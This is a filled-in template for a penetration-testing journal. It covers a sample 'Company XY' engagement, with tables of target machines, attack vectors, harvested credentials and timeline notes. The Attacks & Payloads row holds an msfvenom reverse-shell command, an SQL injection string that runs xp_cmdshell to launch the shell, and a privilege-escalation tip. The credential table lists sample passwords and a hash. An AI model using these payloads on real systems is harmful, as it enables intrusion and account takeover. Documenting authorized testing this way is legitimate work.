πŸ”

Pentest Journal Template (1)

✏️ Overview

πŸ—’οΈ
Name

Company XY pentest
πŸ“…
Time Frame

12 Jan 2024 - 14 Jan 2024
🎯
Goal

Obtain domain admin account
πŸ“

Description

This template is designed to streamline the documentation process during penetration testing. It is divided into four main sections: Machines, Attacks & Payloads, Credentials, and Journal.
The key to effectively using this template is to continuously update each section with new findings and details as your exploration progresses.
You can remove this section or replace it with the complete task description.
Keep in mind that this is not a Pentest Report.

πŸ–₯️ Machines

NameIPIs PwnedIs in domainHas AVHas FWOperating SystemObservationsSuccessful Attack VectorOpen PortsAdditional Notes
Alpha-192.168.1.101β›”βœ…β›”βœ…Windows 10SMB Vulnerability, RDP Brute Force135, 445, 3389SMB seems vulnerable to EternalBlue
Beta-Server192.168.1.102βœ…β›”βœ…βœ…Ubuntu 18.04SSH Weak Credentials, Exposed FTPSSH using found credentials22, 21, 80Credentials found in previous breach dump
Gamma-Box192.168.1.103β›”β›”β›”β›”CentOS 7Outdated Apache Server, Misconfigured sudo80

β˜‘οΈ Findings

β˜‘οΈ Attacks & Payloads

MachineAttack VectorPrerequisitesPayloadAdditional Notes
Alpha-NodeSQLi on /loginmsfvenom -p windows/shell_reverse_tcp

download payload, store in temp, run it
ProductID=1';EXEC master.dbo.xp_cmdshell "powershell C:\windows\temp\reverse.exe"; β€”use GodPotato to escalate privileges to nt authority\system

πŸ‘₯Β Credentials

UsernameHashPasswordIs domain userPurposeAdditional Notes
adminpassword123βœ…Admin login for Gamma-BoxCommon password, easily guessed.
jdoesummer2024!β›”SSH access to Beta-ServerPassword obtained in phishing attack.
backup_user8846f7eaee8fb117ad06bdd830b7586cβ›”Backup service on Alpha-NodeLong time to crack using rockyou.txt.

πŸ“˜ Reports

πŸ“˜ Journal

TimestampMachineNote
12:34Beta-ServerFound common credentials using a previously known breach database. Gained SSH access.